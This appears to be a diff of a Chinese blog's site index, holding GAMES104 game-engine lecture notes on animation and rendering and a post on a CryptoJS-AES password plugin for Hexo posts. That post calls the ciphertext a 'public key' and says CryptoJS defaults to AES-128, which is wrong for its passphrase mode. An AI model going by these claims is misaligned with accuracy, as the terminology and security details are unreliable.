    ​课上说这个雅可比矩阵要放到物理那块去讲。

    Using Jacobian Matrix to Present Joint Rotations

    ​使用雅可比矩阵表示关节旋转

    webp

    Jacobian Matrix with Multiple End-effectors

    ​具有多个末端执行器的雅可比矩阵

    $$J=\begin{bmatrix}\frac{\partial\overrightarrow{s_1}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_1}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_1}}{\partial\theta_n}\\frac{\partial\overrightarrow{s_2}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_2}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_2}}{\partial\theta_n}\\vdots&\vdots&\ddots&\vdots\\frac{\partial\overrightarrow{s_m}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_m}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_m}}{\partial\theta_n}\end{bmatrix}$$

    m: the number of end-effectors

    ​$m$:末端执行器的数量

    n: the number of joints

    ​$n$:关节数量

    Approaching to Target Step by Step

    ​一步步接近目标

    webp

    Other lK Solutions

    ​其他 lK 解决方案

    Physics-based Method

    ​基于物理的方法

    • More natural

      更自然

    • Usually need lots of computation if no optimization

      如果没有优化,通常需要大量计算

    PBD (Position Based Dynamics)

    ​PBD(基于位置的动力学)

    • Different from traditional physics-based method

      与传统的基于物理的方法不同

    • Better visual performance

      更好的视觉表现

    • Lower computational cost

      较低的计算成本

    Fullbody IK in UE5

    ​UE5 中的全身 IK

    • XPBD (Extended PBD)

      XPBD(扩展 PBD)

    IK is still Challenge

    ​IK 仍然是挑战

    webp

    • Self collision avoidance

      自我避免碰撞

    • IK with predication during moving

      移动过程中带有预测的 IK

    • Natural human behavior

      人类的自然行为

      • Data-driven and deep learning

        数据驱动和深度学习

    ​如果做不好容易出现奇葩动画。

    IK Hot Research Areas

    webp

    From Inverse Kinematics Techniques in Computer Graphics: A Survey

    这篇综述认为 IK 式目前的研究热点。

    Updated Animation Pipeline with Blending and lK

    ​使用混合和 lK 更新了动画管道

    webp

    Facial Animation

    ​表情动画

    Face is Driven by Complex Muscle System

    ​现实世界中,面部由复杂的肌肉系统驱动

    webp

    • 43 Muscles

      43 块肌肉

    • Variant shape, strength andmovement

      不同的形状、力量和动作

    • Work together to make expressions

      一起努力制作表情

    High Precision Requirements

    ​高精度要求

    Minor change makes difference:

    ​微小的改变就会带来不同:

    • Voluntary / Forced

      自愿 / 强迫

    • Natural / intentional

      自然 / 故意

    • Sometimes shows quite opposite expressions

      有时表现出完全相反的表情

    Facial Action Coding System

    ​面部动作编码系统

    Facial Action Coding System (FACS) is a system to taxonomize human facial movements by their appearance on the face.

    ​面部动作编码系统(FACS)是一种根据人类面部动作在面部的外观进行分类的系统。

    webp

    Part of 46 basic movements are named action units (AU)

    ​46 个基本动作中的一部分被称为动作单元 (AU)

    Action Units combination

    ​动作单元组合

    webp

    An expression can be considered as a combination of some of the basic movements

    ​一个表情可以被认为是一些基本动作的组合

    28 Core Action units

    ​28 个核心动作单元

    webp

    • Apple Inc. extracted the 28 core AUs

      Apple Inc. 提取了 28 个核心 AU

    • 23 Symmetric AUs are divided into two basic actions

      23 个对称 AU 分为两个基本动作

    • Basic actions set varies accoring to the animation production requirements

      基本动作设置根据动画制作要求而变化

    Key Pose Blending

    ​关键姿势混合

    webp

    A set of key poses (a variation on per-vertex animation)

    ​一组关键姿势(逐顶点动画的变体)

    Problems of Simple Blending

    webp

    ​简单的表情动画混合可能不太好使。比如我想用一个张嘴和闭眼的动作合成一个既张嘴又闭眼的动作。

    FACS In Morph Target Animation

    ​变形目标动画中的 FACS

    webp

    Vertex offset from neutral face

    ​顶点与中性面的偏移

    • Create AU key poses only store vertexes different from the neutral pose (Additive Blending)

      创建所有关键姿势仅存储与中性姿势不同的顶点(加法混合)

    Morph Target Animation

    ​变形目标动画

    webp

    webp

    ​一般表情动画都是顶点动画,不过也可以用骨骼动画强行做。

    UV Texture Facial Animation

    ​UV 纹理面部动画

    webp

    Using a series of texture maps applied to a simple head shape

    ​使用一系列应用于简单头部形状的纹理贴图。Live2D 就是这么做的。

    Muscle Model Animation

    webp

    In the reliance on a physical basis, more precise, but more sophisticated

    ​在依赖物理基础上,更精确,但更复杂。还在研究阶段,没用被广泛应用。

    • Muscle controls most part of the face

      肌肉控制着脸部的大部分

    • 3Layers: Skin Layer, Muscle Layer, Bone Layer

      3 层:皮肤层、肌肉层、骨骼层

    • The point of insertion will move an amount determined by the muscle

      插入点将移动由肌肉决定的量

    The model used for the skin will dictate how the area around the insertion point muscle reacts

    ​用于皮肤的模型将决定插入点肌肉周围的区域如何反应

    Metahuman

    ​超人类

    Animation Retargeting

    ​动画重定向

    Share Animation Among Characters

    ​在角色之间共享动画

    webp

    • Allow animations to be reused between characters (save animator’s work)

      允许在角色之间重复使用动画(节省动画师的工作)

    • Adapt motion captured animations to different characters (reduce the cost)

      使动作捕捉动画适应不同的角色(降低成本)

    Terminology

    ​术语

    webp

    ​已知 Source Character、Target Character 和 Source Animation,求 Target Animation。

    Ignore Offset Between Source and Target joints

    ​忽略源关节和目标关节之间的偏移

    webp

    Keep Orientation in Different Binding Pose

    ​保持不同绑定姿势的方向

    webp

    Process Tracks

    ​进程轨迹

    webp

    Handle animation tracks respectively

    ​分别处理动画轨迹

    • Rotation track comes from source animation

      旋转轨迹来自源动画

      • Keep joint orientation in animation

        保持动画中的关节方向

    • Translation track comes from target skeleton

      变换轨迹来自目标骨架

      • Keep the proportion of target skeleton

        保持目标骨骼的比例

    • Scale track comes from source animation

      音阶轨迹来自源动画

      • Keep the scale in animation

        保持动画比例

    Align Movement by Pelvis Height

    ​根据骨盆高度对齐运动

    webp

    The movement of the character

    ​角色的动作

    • Usually controlled by displacement curve or motor system at runtime

      通常在运行时由位移曲线或电机系统控制

      • Displacement Curve is extracted from the pelvis pose in animation

        位移曲线是从动画中的骨盆姿势中提取的

    • Needs to be scaled by the proportion of the pelvis

      需要根据骨盆的比例进行缩放

    Lock Feet by lK after Retargeting

    ​重新定位后将脚锁定 lK

    webp

    Source Skeleton (left) vs. Target Skeleton with longer thigh (middle) or longer calf (right)

    ​源骨骼(左)与大腿较长(中)或小腿较长(右)的目标骨骼

    webp

    If the thigh is horizontal (left), longer thigh results in hanging feet (middle) while longer calf results in penetration (right)

    ​如果大腿是水平的(左),较长的大腿会导致悬足(中),而较长的小腿则会导致穿透(右)

    Retargeting with Different Skeleton Hierarchy

    ​使用不同的骨架层次结构进行重定向

    webp

    Source Skeleton with 1spine (left) vs. Target Skeleton with 3spines (center)

    ​具有 1 个脊柱的源骨骼(左)与具有 3 个脊柱的目标骨骼(中)

    ​不同人物的骨骼数量可能不同。

    Easy Solution

    webp

    ​绑定骨骼时做好严格的规范,这样就能做到不同数量骨骼间的映射。

    Retargeting Animation in Omniverse

    ​Omniverse 中的重定向动画

    Unresolved Problems of Retargeting

    ​未解决的重定向问题

    webp

    • Self mesh penetration

      自网格穿透

    • Self contact constrains (eg. the hands when clap)

      自我接触限制(例如拍手时的手)

    • The balance of the target character

      目标角色的平衡性

    Morph Animation Retargeting

    ​变形动画重定向

    webp

    Different face sharing the same topology

    ​不同的面共享相同的拓扑

    Morph Animation Retargeting Peoblem

    webp

    webp

    ​动画重定向后眼睛闭不上之类的问题。

    Take Away

    • Controlled animation blending system is the key to animate character according to game play

      受控动画混合系统是根据游戏玩法制作角色动画的关键

    • Inverse Kinematics help character’s animation adapt to environment constrains

      逆运动学帮助角色的动画适应环境限制

    • Facial expression can be encoded in Action Units in FACS

      面部表情可以编码在 FACS 的动作单元中

    • Morph target animation is well applied in facial animation

      变形目标动画在面部动画中得到很好的应用

    • Retarget can help reuse skeleton animation and facial animations among characters

      重新定位可以帮助在角色之间重用骨骼动画和面部动画

    ]]>
    @@ -1888,7 +1888,7 @@ /posts/Hexo-%E5%9F%BA%E4%BA%8E%20CryptoJS-AES%20%E7%9A%84%20Hexo%20%E6%96%87%E7%AB%A0%E7%89%87%E6%AE%B5%E5%8A%A0%E5%AF%86%E6%8F%92%E4%BB%B6/ - 看一看

    耍一耍

    CryptoJS-AES 加密/解密工具

    私钥:

    公钥:

    内容:

    写一写

    hexo-blog-encrypt 这个插件只可以加密整个文章,却不能只加密文章中的某个片段,不够灵活。借助 CryptoJS-AES 开发一个简易的文章片段加密插件!这样就可以在我的日记中方便地隐藏我不想公开的部分(比如说 pro 哥坏话)!

    前端

    ​ 研究一下 crypto-js 中 AES 的使用。我想让我的文章在前端中只暴露公钥,不暴露密码和内容。目前 AES 还不能被破解(小小怪如此说道),因此在只有公钥的情况下,不输入正确的密码是无法看到内容的:


    ​在网页中引入 crypto-js

    <script src="crypto-js.min.js" defer></script>

    ​借助 crypto-js,可以写一个使用 AES 加密的逻辑:

    CryptoJS.AES.encrypt(内容, 私钥).toString()

    ​CryptoJS 默认使用 AES-128 加密算法。如果需要使用 AES-256 加密算法,可以在调用 encrypt 方法时传入自定义的秘钥和参数。(但我觉得 AES-128 算法就够用了)

    这个函数输入:

    • 内容:<p>Hello world!<p>
    • 私钥:123

    将会输出:

    • 公钥:U2FsdGVkX1/sbg7iJYyl2slEm9bWPVigmMvoutWnbR+031yQYZcWS2tBoaJMRtbY

    每次输出的公钥还不唯一……

    ​使用 AES 解密:

    CryptoJS.AES.decrypt(公钥, 私钥).toString(CryptoJS.enc.Utf8));

    ​如果公钥和私钥正确,将会正确返回内容,如果错误则返回空。

    ​有时候解密时会出现 Error: Malformed UTF-8 data 错误导致解密失败,参考一下 javascript - Why I get Malformed UTF-8 data error on crypto-js? - Stack Overflow……我也不知道具体啥情况,多检查几遍代码看看哪里有错吧……


    ​好的,现在我们正确掌握了内容、公钥和私钥之间的转换逻辑。如果内容的字符串是一段 HTML 代码,则我们可以将其渲染出来

    ​基于此,我们可以使用 JQuery 定义一个 AESContainer 类以实现我们的文章加密插件:

    class AESContainer {
    constructor(label, pubkey) {
    this.pubkey = pubkey;
    this.container = $('<div>').addClass('AES-container');
    this.inputContainer = $('<div>').addClass('AES-input');
    this.inputField = $('<input>').attr({type: 'password', required: true});
    this.highlight = $('<span>').addClass('hl');
    this.bar = $('<span>').addClass('bar');
    this.label = $('<label>').text(label);

    this.inputContainer.append(this.inputField, this.highlight, this.bar, this.label);
    this.container.append(this.inputContainer);

    this.inputField.on('keypress', this.handleKeyPress.bind(this));
    }

    handleKeyPress(event) {
    if (event.key === 'Enter') {
    this.decrypted = CryptoJS.AES.decrypt(this.pubkey, this.inputField.val()).toString(CryptoJS.enc.Utf8);
    if (this.decrypted) {
    this.inputContainer.remove();
    this.container.append($(this.decrypted));
    }
    }
    }

    render() {
    $(document.currentScript).before(this.container);
    }
    }

    ​再设计偷一个好看的 CSS:

    .AES-container {
    border: 2px solid var(--border);
    margin: 10px auto;
    padding: 10px 20px;
    width: 100%;
    box-sizing: border-box;
    transition: border 0.5s ease-in-out;
    }

    /* form starting stylings ------------------------------- */
    .AES-container .AES-input {
    position: relative;
    margin: 20px 0 10px;
    box-sizing: border-box;
    }

    .AES-input input {
    font-size: 16px;
    padding: 5px 2px;
    display: block;
    width: calc(100% - 4px);
    border: none;
    border-bottom: 2px solid var(--border);
    background: none;
    color: var(--text-primary);
    transition: color 0.5s ease-in-out, border 0.5s ease-in-out;
    }

    .AES-input input:focus {
    outline: none;
    }

    /* LABEL ======================================= */
    .AES-input label {
    color: var(--text-secondary);
    font-size: 16px;
    font-weight: normal;
    position: absolute;
    pointer-events: none;
    top: -5px;
    transition: 0.2s ease all;
    -moz-transition: 0.2s ease all;
    -webkit-transition: 0.2s ease all;
    }

    /* active state */
    .AES-input input:focus~label,
    .AES-input input:valid~label {
    top: -20px;
    font-size: 14px;
    color: var(--text-link);
    }

    /* BOTTOM BARS ================================= */
    .AES-input .bar {
    position: relative;
    display: block;
    width: 100%;
    }

    .AES-input .bar:before,
    .AES-input .bar:after {
    content: '';
    height: 2px;
    width: 0;
    transform: translateY(-2px);
    position: absolute;
    background: var(--text-link);
    transition: 0.2s ease all;
    -moz-transition: 0.2s ease all;
    -webkit-transition: 0.2s ease all;
    }

    .AES-input .bar:before {
    left: 50%;
    }

    .AES-input .bar:after {
    right: 50%;
    }

    /* active state */
    .AES-input input:focus~.bar:before,
    .AES-input input:focus~.bar:after {
    width: 50%;
    }

    /* hlER ================================== */
    .AES-input .hl {
    position: absolute;
    height: 60%;
    width: 100px;
    top: 25%;
    left: 0;
    pointer-events: none;
    opacity: 0.5;
    }

    /* active state */
    .AES-input input:focus~.hl {
    -webkit-animation: inputhler 0.3s ease;
    -moz-animation: inputhler 0.3s ease;
    animation: inputhler 0.3s ease;
    }

    /* ANIMATIONS ================ */
    @-webkit-keyframes inputhler {
    from {
    background: var(--text-link);
    }

    to {
    width: 0;
    background: transparent;
    }
    }

    @-moz-keyframes inputhler {
    from {
    background: var(--text-link);
    }

    to {
    width: 0;
    background: transparent;
    }
    }

    @keyframes inputhler {
    from {
    background: var(--text-link);
    }

    to {
    width: 0;
    background: transparent;
    }
    }

    ​如此做,使用如下语句:

    <script>
    new AESContainer('标签提示词', '公钥').render();
    </script>

    ​即可在 <script> 前创建并渲染一个输入密码的提示框:

    <div class="AES-container">
    <div class="AES-input">
    <input type="password" required="required">
    <span class="hl"></span>
    <span class="bar"></span>
    <label>标签提示词</label>
    </div>
    </div>

    ​真是太棒了!现在我们需要后端帮我们自动生成公钥。

    后端

    ​借助 标签插件(Tag)| Hexo,在 Markdown 中如此写作:

    {% AES '123','密码是"123"~' %}
    Hello world!
    {% endAES %}

    ​经过 Hexo 渲染后转义为:

    <script>new AESContainer('密码是"123"~', 'U2FsdGVkX1+LNox3Pwx7PH6x6yoSjddDb1gcOrYcFddHTHX/6AEXT0VTZUI1nhN5').render();</script>

    ​便大功告成!


    ​在 Hexo 项目根目录下输入如下命令以安装 crypto-js

    npm install crypto-js

    ​在 Hexo 项目下的 scripts 文件夹下新建文件 AES.js,里面写转义标签的逻辑:

    'use strict'

    var CryptoJS = require("crypto-js");

    const parseArgs = args => {
    return args.join(' ').split(',')
    }

    const AESFn = (args, content) => {
    const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args)
    content = hexo.render.renderSync({ text: content, engine: 'markdown' });
    if (password == "") {
    return content;
    } else {
    const pubkey = CryptoJS.AES.encrypt(content, password).toString();
    const result = `<script>new AESContainer('${label}', '${pubkey}').render();</script>`;
    return result;
    }
    }

    hexo.extend.tag.register('AES', AESFn, { ends: true })
    • const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args) 获取参数,对于标签:

      {% AES '123','密码是"123"~' %}
      • password 为设定的密码 123
      • label 为标签提示词 密码是"123"~,如果为空,则默认值:这里的内容需要输入密码才能查看~,注意逗号后不要有空格。
    • hexo.extend.tag.register('AES', AESFn, { ends: true }) 对于所有 {% AES %}{% endAES %} 标签,调用 ASEFn() 函数处理。

    • hexo.render.renderSync({ text: content, engine: 'markdown' }); 借助 Hexo 渲染引擎,将 Markdown 语句转义为 HTML 语句。

    • CryptoJS.AES.encrypt(content, password).toString(); 该函数输入私钥和内容,输出成公钥。

    • <script>new AESContainer('${label}', '${pubkey}').render();</script> 渲染最后转义出的内容并置于当前 <script> 前。

    ​重新编译,大功告成。

    试一试

    念桥边红药

    ​在下面的框框中输入密码 promefire 即可产生 promefire 最喜欢的诗句!

    {% AES 'promefire','密码是"promefire"~' %}
    <marquee behavior="scroll" direction="right" scrollamount="15"><font color="red" size="4px">念桥边红药,年年知为谁生?</font></marquee>
    {% endAES %}

    大故宫

    ​在下面的框框中输入密码 12345678 即可欣赏大故宫!

    {% AES '12345678','密码是"12345678"~' %}
    ![人去楼不空 往昔的叱咤化作春色满园](/2024/05/20/Diary-老儿北儿京儿/1435.webp)
    <center>人去楼不空 往昔的叱咤化作春色满园</center>
    {% endAES %}

    ​请注意:解密后的显示的内容可能需要重新调用一下网页初始化的相关函数才能达到未加密的显示效果!

    ]]>
    + 看一看

    耍一耍

    CryptoJS-AES 加密/解密工具

    私钥:

    公钥:

    内容:

    写一写

    hexo-blog-encrypt 这个插件只可以加密整个文章,却不能只加密文章中的某个片段,不够灵活。借助 CryptoJS-AES 开发一个简易的文章片段加密插件!这样就可以在我的日记中方便地隐藏我不想公开的部分(比如说 pro 哥坏话)!

    前端

    ​ 研究一下 crypto-js 中 AES 的使用。我想让我的文章在前端中只暴露公钥,不暴露密码和内容。目前 AES 还不能被破解(小小怪如此说道),因此在只有公钥的情况下,不输入正确的密码是无法看到内容的:


    ​在网页中引入 crypto-js

    1
    <script src="crypto-js.min.js" defer></script>

    ​借助 crypto-js,可以写一个使用 AES 加密的逻辑:

    1
    CryptoJS.AES.encrypt(内容, 私钥).toString()

    ​CryptoJS 默认使用 AES-128 加密算法。如果需要使用 AES-256 加密算法,可以在调用 encrypt 方法时传入自定义的秘钥和参数。(但我觉得 AES-128 算法就够用了)

    这个函数输入:

    • 内容:<p>Hello world!<p>
    • 私钥:123

    将会输出:

    • 公钥:U2FsdGVkX1/sbg7iJYyl2slEm9bWPVigmMvoutWnbR+031yQYZcWS2tBoaJMRtbY

    每次输出的公钥还不唯一……

    ​使用 AES 解密:

    1
    CryptoJS.AES.decrypt(公钥, 私钥).toString(CryptoJS.enc.Utf8));

    ​如果公钥和私钥正确,将会正确返回内容,如果错误则返回空。

    ​有时候解密时会出现 Error: Malformed UTF-8 data 错误导致解密失败,参考一下 javascript - Why I get Malformed UTF-8 data error on crypto-js? - Stack Overflow……我也不知道具体啥情况,多检查几遍代码看看哪里有错吧……


    ​好的,现在我们正确掌握了内容、公钥和私钥之间的转换逻辑。如果内容的字符串是一段 HTML 代码,则我们可以将其渲染出来

    ​基于此,我们可以使用 JQuery 定义一个 AESContainer 类以实现我们的文章加密插件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    class AESContainer {
    constructor(label, pubkey) {
    this.pubkey = pubkey;
    this.container = $('<div>').addClass('AES-container');
    this.inputContainer = $('<div>').addClass('AES-input');
    this.inputField = $('<input>').attr({type: 'password', required: true});
    this.highlight = $('<span>').addClass('hl');
    this.bar = $('<span>').addClass('bar');
    this.label = $('<label>').text(label);

    this.inputContainer.append(this.inputField, this.highlight, this.bar, this.label);
    this.container.append(this.inputContainer);

    this.inputField.on('keypress', this.handleKeyPress.bind(this));
    }

    handleKeyPress(event) {
    if (event.key === 'Enter') {
    this.decrypted = CryptoJS.AES.decrypt(this.pubkey, this.inputField.val()).toString(CryptoJS.enc.Utf8);
    if (this.decrypted) {
    this.inputContainer.remove();
    this.container.append($(this.decrypted));
    }
    }
    }

    render() {
    $(document.currentScript).before(this.container);
    }
    }

    ​再设计偷一个好看的 CSS:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    .AES-container {
    border: 2px solid var(--border);
    margin: 10px auto;
    padding: 10px 20px;
    width: 100%;
    box-sizing: border-box;
    transition: border 0.5s ease-in-out;
    }

    /* form starting stylings ------------------------------- */
    .AES-container .AES-input {
    position: relative;
    margin: 20px 0 10px;
    box-sizing: border-box;
    }

    .AES-input input {
    font-size: 16px;
    padding: 5px 2px;
    display: block;
    width: calc(100% - 4px);
    border: none;
    border-bottom: 2px solid var(--border);
    background: none;
    color: var(--text-primary);
    transition: color 0.5s ease-in-out, border 0.5s ease-in-out;
    }

    .AES-input input:focus {
    outline: none;
    }

    /* LABEL ======================================= */
    .AES-input label {
    color: var(--text-secondary);
    font-size: 16px;
    font-weight: normal;
    position: absolute;
    pointer-events: none;
    top: -5px;
    transition: 0.2s ease all;
    -moz-transition: 0.2s ease all;
    -webkit-transition: 0.2s ease all;
    }

    /* active state */
    .AES-input input:focus~label,
    .AES-input input:valid~label {
    top: -20px;
    font-size: 14px;
    color: var(--text-link);
    }

    /* BOTTOM BARS ================================= */
    .AES-input .bar {
    position: relative;
    display: block;
    width: 100%;
    }

    .AES-input .bar:before,
    .AES-input .bar:after {
    content: '';
    height: 2px;
    width: 0;
    transform: translateY(-2px);
    position: absolute;
    background: var(--text-link);
    transition: 0.2s ease all;
    -moz-transition: 0.2s ease all;
    -webkit-transition: 0.2s ease all;
    }

    .AES-input .bar:before {
    left: 50%;
    }

    .AES-input .bar:after {
    right: 50%;
    }

    /* active state */
    .AES-input input:focus~.bar:before,
    .AES-input input:focus~.bar:after {
    width: 50%;
    }

    /* hlER ================================== */
    .AES-input .hl {
    position: absolute;
    height: 60%;
    width: 100px;
    top: 25%;
    left: 0;
    pointer-events: none;
    opacity: 0.5;
    }

    /* active state */
    .AES-input input:focus~.hl {
    -webkit-animation: inputhler 0.3s ease;
    -moz-animation: inputhler 0.3s ease;
    animation: inputhler 0.3s ease;
    }

    /* ANIMATIONS ================ */
    @-webkit-keyframes inputhler {
    from {
    background: var(--text-link);
    }

    to {
    width: 0;
    background: transparent;
    }
    }

    @-moz-keyframes inputhler {
    from {
    background: var(--text-link);
    }

    to {
    width: 0;
    background: transparent;
    }
    }

    @keyframes inputhler {
    from {
    background: var(--text-link);
    }

    to {
    width: 0;
    background: transparent;
    }
    }

    ​如此做,使用如下语句:

    1
    2
    3
    <script>
    new AESContainer('标签提示词', '公钥').render();
    </script>

    ​即可在 <script> 前创建并渲染一个输入密码的提示框:

    1
    2
    3
    4
    5
    6
    7
    8
    <div class="AES-container">
    <div class="AES-input">
    <input type="password" required="required">
    <span class="hl"></span>
    <span class="bar"></span>
    <label>标签提示词</label>
    </div>
    </div>

    ​真是太棒了!现在我们需要后端帮我们自动生成公钥。

    后端

    ​借助 标签插件(Tag)| Hexo,在 Markdown 中如此写作:

    1
    2
    3
    {% AES '123','密码是"123"~' %}
    Hello world!
    {% endAES %}

    ​经过 Hexo 渲染后转义为:

    1
    <script>new AESContainer('密码是"123"~', 'U2FsdGVkX1+LNox3Pwx7PH6x6yoSjddDb1gcOrYcFddHTHX/6AEXT0VTZUI1nhN5').render();</script>

    ​便大功告成!


    ​在 Hexo 项目根目录下输入如下命令以安装 crypto-js

    1
    npm install crypto-js

    ​在 Hexo 项目下的 scripts 文件夹下新建文件 AES.js,里面写转义标签的逻辑:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    'use strict'

    var CryptoJS = require("crypto-js");

    const parseArgs = args => {
    return args.join(' ').split(',')
    }

    const AESFn = (args, content) => {
    const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args)
    content = hexo.render.renderSync({ text: content, engine: 'markdown' });
    if (password == "") {
    return content;
    } else {
    const pubkey = CryptoJS.AES.encrypt(content, password).toString();
    const result = `<script>new AESContainer('${label}', '${pubkey}').render();</script>`;
    return result;
    }
    }

    hexo.extend.tag.register('AES', AESFn, { ends: true })
    • const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args) 获取参数,对于标签:

      1
      {% AES '123','密码是"123"~' %}
      • password 为设定的密码 123
      • label 为标签提示词 密码是"123"~,如果为空,则默认值:这里的内容需要输入密码才能查看~,注意逗号后不要有空格。
    • hexo.extend.tag.register('AES', AESFn, { ends: true }) 对于所有 {% AES %}{% endAES %} 标签,调用 ASEFn() 函数处理。

    • hexo.render.renderSync({ text: content, engine: 'markdown' }); 借助 Hexo 渲染引擎,将 Markdown 语句转义为 HTML 语句。

    • CryptoJS.AES.encrypt(content, password).toString(); 该函数输入私钥和内容,输出成公钥。

    • <script>new AESContainer('${label}', '${pubkey}').render();</script> 渲染最后转义出的内容并置于当前 <script> 前。

    ​重新编译,大功告成。

    试一试

    念桥边红药

    ​在下面的框框中输入密码 promefire 即可产生 promefire 最喜欢的诗句!

    1
    2
    3
    {% AES 'promefire','密码是"promefire"~' %}
    <marquee behavior="scroll" direction="right" scrollamount="15"><font color="red" size="4px">念桥边红药,年年知为谁生?</font></marquee>
    {% endAES %}

    大故宫

    ​在下面的框框中输入密码 12345678 即可欣赏大故宫!

    1
    2
    3
    4
    {% AES '12345678','密码是"12345678"~' %}
    ![人去楼不空 往昔的叱咤化作春色满园](/2024/05/20/Diary-老儿北儿京儿/1435.webp)
    <center>人去楼不空 往昔的叱咤化作春色满园</center>
    {% endAES %}

    ​请注意:解密后的显示的内容可能需要重新调用一下网页初始化的相关函数才能达到未加密的显示效果!

    ]]>
    @@ -1921,7 +1921,7 @@ /posts/GAMES104-Rendering/ - 资源

    课程

    第四节:游戏引擎中的渲染实践

    Rendering on Game Engine

    Rendering System in Games

    webp

    ​游戏渲染发展历程。

    Q: Is there any game without rendering?

    ​有。比如文字游戏。

    Rendering on Graphics Theory

    • Objects with one type of effect

      具有一种效果的对象

    • Focus on representation and math correctness

      注重表示和数学正确性

    • No strict performance requirement

      无严格的性能要求

      • Realtime (30 FPS) / interactive (10 FPS)

        实时 (30 FPS) / 交互式 (10 FPS)

        对于游戏来说,应保证游戏画面流畅

      • offline rendering

        离线渲染(无法实时渲染,如电影,海报等,画质好)

      • Out-of-core rendering

        核外渲染

    Challenges on Game Rendering (1/4)

    webp

    Tens of thousands of objects with dozens type of effects

    ​数万个物体,数十种效果。容易跑不动。

    Challenges on Game Rendering (2/4)

    webp

    Deal with architecture of modern computer with a complex combination of CPU and GPU

    ​处理具有 CPU 和 GPU 复杂组合的现代计算机体系结构。(设计游戏引擎时,要考虑 CPU 和 GPU 的架构来写代码)

    Challenges on Game Rendering (3/4)

    webp

    Commit a bullet-proof framerate

    ​保证帧率

    • 30 FPS (60 FPS,120 FPS + VR)

    • 1080P, 4K and 8K resolution

    ​现在对游戏的分辨率和帧率要求越来越高了。

    Challenges on Game Rendering (4/4)

    • Limit access to CPU bandwidthand memory footprint

      限制对 CPU 带宽和内存占用的访问

    • Game logic, network, animation, physics and Al systems are major consumers of CPU and main memory

      游戏逻辑、网络、动画、物理和人工智能系统是 CPU 和主存的主要消耗者

    Rendering on Game Engine

    A heavily optimized practical software framework to fulfill the critical rendering requirements of games on modern hardware (PC, console and mobiles)

    ​高度优化的实用软件框架,可满足现代硬件(PC、游戏机和移动设备)上游戏的关键渲染要求

    Outline of Rendering

    ​本课程主要介绍的渲染技术,仅是蜻蜓点水,这玩意太复杂了。

    1. Basics of Game Rendering

      游戏渲染基础知识

      • Hardware architecture

        硬件架构

      • Render data organization

        渲染数据组织

      • Visibility

        能见度

    2. Materials, Shaders and Lighting

      材质、着色器和光照

      • PBR (SG, MR)

        PBR(SG、MR)

      • Shader permutation

        着色器排列

      • Lighting

        灯光

        • Point / Directional lighting

          点/定向照明

        • IBL / Simple GI

          IBL / 简单 GI

    3. Special Renering

      特殊渲染

      • Terrain

        地形

      • Sky / Fog

        天空/雾

      • Postprocess

        后期处理

    4. Pipeline

      管道

      • Forward, deferred rendering, forward plus

        前向、延迟渲染、前向加号

      • Real pipeline with mixed effects

        具有混合效果的真实管道

      • Ring buffer and V-Sync

        环形缓冲区和垂直同步

      • Tiled-based rendering

        基于平铺的渲染

    What Is Not Included

    • Cartoon Rendering

      卡通渲染(非真实渲染)

    • 2D Rendering Engine

      二维渲染引擎(三渲二)

    • Subsurface

      皮肤

    • Hair /Fur

      头发 / 皮毛

    Building Blocks of Rendering

    ​渲染的构建块

    Rendering Pipeline and Data

    ​渲染管道及数据

    webp

    ​图像的渲染过程。从 GAMES101 里搬来的图。

    Tens of millions of pixels with hundreds ALU and dozen of texture samplings.

    ​数千万像素,数百个 ALU 和数十个纹理采样。

    Computation - Projection and Rasterization

    ​计算-投影和光栅化

    webp

    Computation - Shading

    ​计算-着色

    ​写的 Shader 在显卡中存储/计算。

    webp

    A shader sample code

    ​着色器示例代码

    • Constants /Parameters

      常量/参数

    • ALU algorithms

      ALU 算法

    • Texture Sampling

      纹理采样

    • Branches

      分支

    Computation -Texture Sampling

    ​计算-纹理采样

    webp

    • Step1

      Use two nearest mipmap levels

      使用两个最近的 mipmap 级别

    • Step2

      Perform bilinear interpolation in both mip-maps

      在两个 mip-map 中执行双线性插值

    • Step3

      Linearly interpolate betweenthe results

      在结果之间进行线性插值

    Understanding the Hardware

    ​即使是游戏开发者/技术美术工作人员,了解一下显卡的基本架构也是很有用的。

    GPU

    The dedicated hardware to solve massive jobs

    ​解决大量工作的专用硬件

    SIMD and SIMT

    webp

    SlMD (Single Instruction Multiple Data 单指令多数据)

    • Describes computers with multiple processing elements that perform the same operation on multiple data points simultaneously

      描述具有多个处理元件的计算机,这些元件同时对多个数据点执行相同的操作

    webp

    SlMT (Single Instruction Multiple Threads 单指令多线程)

    • An execution model used in parallel computing where single instruction, multiple data (SlMD) is combined with multithreading

      并行计算中使用的执行模型,其中单指令、多数据 (SlMD) 与多线程相结合

    GPU Architecture

    webp

    GPC (Graphics Processing Cluster 图形处理集群)

    A dedicated hardware block for computing, rasterization, shadingand texturing

    ​用于计算、光栅化、着色和纹理的专用硬件块

    SM (Streaming Multiprocessor 流式多处理器)

    Part of the GPU that runs CUDA kernels

